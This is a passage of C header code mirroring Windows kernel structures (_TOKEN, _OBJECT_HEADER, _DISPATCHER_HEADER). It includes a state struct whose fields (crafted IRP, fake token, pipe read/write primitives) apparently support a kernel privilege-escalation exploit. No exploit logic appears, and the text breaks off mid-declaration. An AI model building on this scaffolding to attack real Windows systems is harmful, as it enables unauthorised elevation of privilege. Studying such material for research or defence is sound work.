    VOID* Package; //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
    ULONG CapabilityCount; //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448
    VOID* TrustLevelSid; //0x450
    struct _TOKEN* TrustLinkedToken; //0x458
    VOID* IntegrityLevelSidValue; //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
    VOID* SessionObject; //0x488
    // Start of the variable-length tail (SIDs, DACL, ...) that follows the
    // fixed part; OFFSET_IN_TOKEN_VARIABLEPART names this offset.
    ULONGLONG VariablePart; //0x490
};

//0x38 bytes (sizeof)

// Mirror of the object-manager header (0x38 bytes per the author's note) that
// precedes every kernel object. Body is typed as `struct _TOKEN` here, so this
// declaration describes specifically a token object with its header; the
// generic kernel definition presumably uses an untyped body.
struct _OBJECT_HEADER
{
    LONGLONG PointerCount; //0x0
    union
    {
        LONGLONG HandleCount; //0x8
        VOID* NextToFree; //0x8
    };
    struct _EX_PUSH_LOCK Lock; //0x10
    UCHAR TypeIndex; //0x18
    union
    {
        UCHAR TraceFlags; //0x19
        struct
        {
            UCHAR DbgRefTrace : 1; //0x19
            UCHAR DbgTracePermanent : 1; //0x19
        };
    };
    UCHAR InfoMask; //0x1a
    union
    {
        UCHAR Flags; //0x1b
        struct
        {
            UCHAR NewObject : 1; //0x1b
            UCHAR KernelObject : 1; //0x1b
            UCHAR KernelOnlyAccess : 1; //0x1b
            UCHAR ExclusiveObject : 1; //0x1b
            UCHAR PermanentObject : 1; //0x1b
            UCHAR DefaultSecurityQuota : 1; //0x1b
            UCHAR SingleHandleEntry : 1; //0x1b
            UCHAR DeletedInline : 1; //0x1b
        };
    };
    ULONG Reserved; //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged; //0x20
    };
    VOID* SecurityDescriptor; //0x28
    struct _TOKEN Body; //0x30
};

// State bag shared between stages of the code outside this view: user-mode
// buffers (`fake_data_entry`, `input`, the `*_control_block` and `p_mem_*`
// pointers), pointers typed as the kernel mirrors declared above, and the
// pipe/file/token handles. Nothing on this page reads or writes these fields,
// so ownership and lifetime of each buffer cannot be documented here.
struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};

//0x18 bytes (sizeof)

struct _DISPATCHER_HEADER

{

union

{

volatile LONG Lock; //0x0

LONG LockNV; //0x0

struct

{

UCHAR Type; //0x0

UCHAR Signalling; //0x1

UCHAR Size; //0x2

UCHAR Reserved1; //0x3

};

struct

{

UCHAR TimerType; //0x0

union

{

UCHAR TimerControlFlags; //0x1

struct

{

UCHAR Absolute : 1;
